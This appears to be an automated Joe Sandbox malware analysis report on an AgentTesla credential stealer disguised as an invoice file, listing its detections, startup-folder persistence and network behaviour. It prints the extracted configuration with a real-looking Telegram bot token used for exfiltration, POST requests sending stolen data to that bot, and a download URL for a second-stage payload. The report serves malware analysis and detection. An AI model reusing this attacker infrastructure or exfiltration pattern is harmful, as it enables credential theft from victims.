Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Proforma Invoice.scr.exe

Overview

General Information

Sample name:Proforma Invoice.scr.exe
Analysis ID:1545982
MD5:3efcf6123cc2697d54be8e8d17f70eb6
SHA1:194d4304e6fbea7bcc5203d9f5dd7c0883277fb1
SHA256:a05acadb64d5923e931a42aecca755b6a160b39f96ec1bff8611cd5116b4c926
Tags:exeuser-lowmal3
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Proforma Invoice.scr.exe (PID: 4000 cmdline: "C:\Users\user\Desktop\Proforma Invoice.scr.exe" MD5: 3EFCF6123CC2697D54BE8E8D17F70EB6)
    • InstallUtil.exe (PID: 3412 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 2620 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • EncoderFallback.exe (PID: 6828 cmdline: "C:\Users\user\AppData\Roaming\EncoderFallback.exe" MD5: 3EFCF6123CC2697D54BE8E8D17F70EB6)
      • InstallUtil.exe (PID: 5868 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendMessage?chat_id=7068829394"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000003.00000002.2755078286.00000000028F8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000003.00000002.2755078286.00000000028F8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              Click to see the 46 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.Proforma Invoice.scr.exe.6430000.13.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.Proforma Invoice.scr.exe.36bf7a0.3.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.2.Proforma Invoice.scr.exe.36bf7a0.3.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    0.2.Proforma Invoice.scr.exe.36bf7a0.3.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                      0.2.Proforma Invoice.scr.exe.36bf7a0.3.raw.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                      • 0x3566a:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                      • 0x356dc:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                      • 0x35766:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                      • 0x357f8:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                      • 0x35862:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                      • 0x358d4:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                      • 0x3596a:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                      • 0x359fa:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                      Click to see the 19 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs" , ProcessId: 2620, ProcessName: wscript.exe
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs" , ProcessId: 2620, ProcessName: wscript.exe

                      Data Obfuscation

                      barindex
                      Sigma detected: Drops script at startup location
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Proforma Invoice.scr.exe, ProcessId: 4000, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-31T11:14:22.467203+010020229301A Network Trojan was detected20.109.210.53443192.168.2.649818TCP
                      2024-10-31T11:14:51.363526+010020229301A Network Trojan was detected20.109.210.53443192.168.2.651758TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-31T11:14:34.440817+010028517791Malware Command and Control Activity Detected192.168.2.649879149.154.167.220443TCP
                      2024-10-31T11:14:58.092083+010028517791Malware Command and Control Activity Detected192.168.2.651775149.154.167.220443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-31T11:14:34.440817+010028528151Malware Command and Control Activity Detected192.168.2.649879149.154.167.220443TCP
                      2024-10-31T11:14:36.494538+010028528151Malware Command and Control Activity Detected192.168.2.649890149.154.167.220443TCP
                      2024-10-31T11:14:58.092083+010028528151Malware Command and Control Activity Detected192.168.2.651775149.154.167.220443TCP
                      2024-10-31T11:14:59.486489+010028528151Malware Command and Control Activity Detected192.168.2.651776149.154.167.220443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: Proforma Invoice.scr.exeAvira: detected
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeAvira: detection malicious, Label: HEUR/AGEN.1308518
                      Found malware configuration
                      Source: 3.2.InstallUtil.exe.340000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendMessage?chat_id=7068829394"}
                      Source: InstallUtil.exe.5868.7.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendMessage"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeReversingLabs: Detection: 60%
                      Multi AV Scanner detection for submitted file
                      Source: Proforma Invoice.scr.exeReversingLabs: Detection: 60%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: Proforma Invoice.scr.exeJoe Sandbox ML: detected
                      Source: Proforma Invoice.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 173.237.185.182:443 -> 192.168.2.6:49737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49841 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49879 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 173.237.185.182:443 -> 192.168.2.6:49910 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:51774 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:51775 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:51776 version: TLS 1.2
                      Source: Proforma Invoice.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003578000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2454133386.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003633000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003C69000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Proforma Invoice.scr.exe, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003578000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2454133386.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003633000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003C69000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 4x nop then jmp 05D3A58Fh6_2_05D3A61A
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 4x nop then jmp 05D3A58Fh6_2_05D3A2C0
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 4x nop then jmp 05D3A58Fh6_2_05D3A2B0

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.6:49879 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.6:49879 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.6:49890 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.6:51776 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.6:51775 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.6:51775 -> 149.154.167.220:443
                      Uses the Telegram API (likely for C&C communication)
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: global trafficHTTP traffic detected: GET /wp-includes/Hjewct.vdf HTTP/1.1Host: geocs.mxConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcf97349026ea0Host: api.telegram.orgContent-Length: 981Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcf98afee4d99aHost: api.telegram.orgContent-Length: 918Expect: 100-continue
                      Source: global trafficHTTP traffic detected: GET /wp-includes/Hjewct.vdf HTTP/1.1Host: geocs.mxConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcf973572514ecHost: api.telegram.orgContent-Length: 981Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcf9857b3d199bHost: api.telegram.orgContent-Length: 918Expect: 100-continue
                      Source: Joe Sandbox ViewIP Address: 173.237.185.182 173.237.185.182
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.6:49818
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.6:51758
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /wp-includes/Hjewct.vdf HTTP/1.1Host: geocs.mxConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-includes/Hjewct.vdf HTTP/1.1Host: geocs.mxConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: geocs.mx
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: unknownHTTP traffic detected: POST /bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcf97349026ea0Host: api.telegram.orgContent-Length: 981Expect: 100-continueConnection: Keep-Alive
                      Source: InstallUtil.exe, 00000003.00000002.2755078286.00000000028F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2755078286.000000000296B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.00000000028C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.000000000294D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2454133386.0000000002571000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2755078286.0000000002871000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.000000000284C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2750748078.0000000000342000.00000040.00000400.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003CDF000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2750748078.0000000000342000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2755078286.0000000002871000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003CDF000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.000000000284C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: InstallUtil.exe, 00000003.00000002.2755078286.0000000002871000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.000000000284C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: InstallUtil.exe, 00000003.00000002.2755078286.0000000002871000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.000000000284C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: InstallUtil.exe, 00000003.00000002.2755078286.00000000028F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2755078286.000000000296B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.00000000028C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.000000000294D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2750748078.0000000000342000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2755078286.0000000002871000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003CDF000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.000000000284C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/
                      Source: InstallUtil.exe, 00000003.00000002.2755078286.00000000028F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2755078286.000000000296B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.00000000028C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3529968351.000000000294D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendDocument
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2454133386.0000000002571000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://geocs.mx
                      Source: Proforma Invoice.scr.exe, EncoderFallback.exe.0.drString found in binary or memory: https://geocs.mx/wp-includes/Hjewct.vdf
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2454133386.0000000002618000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002C37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
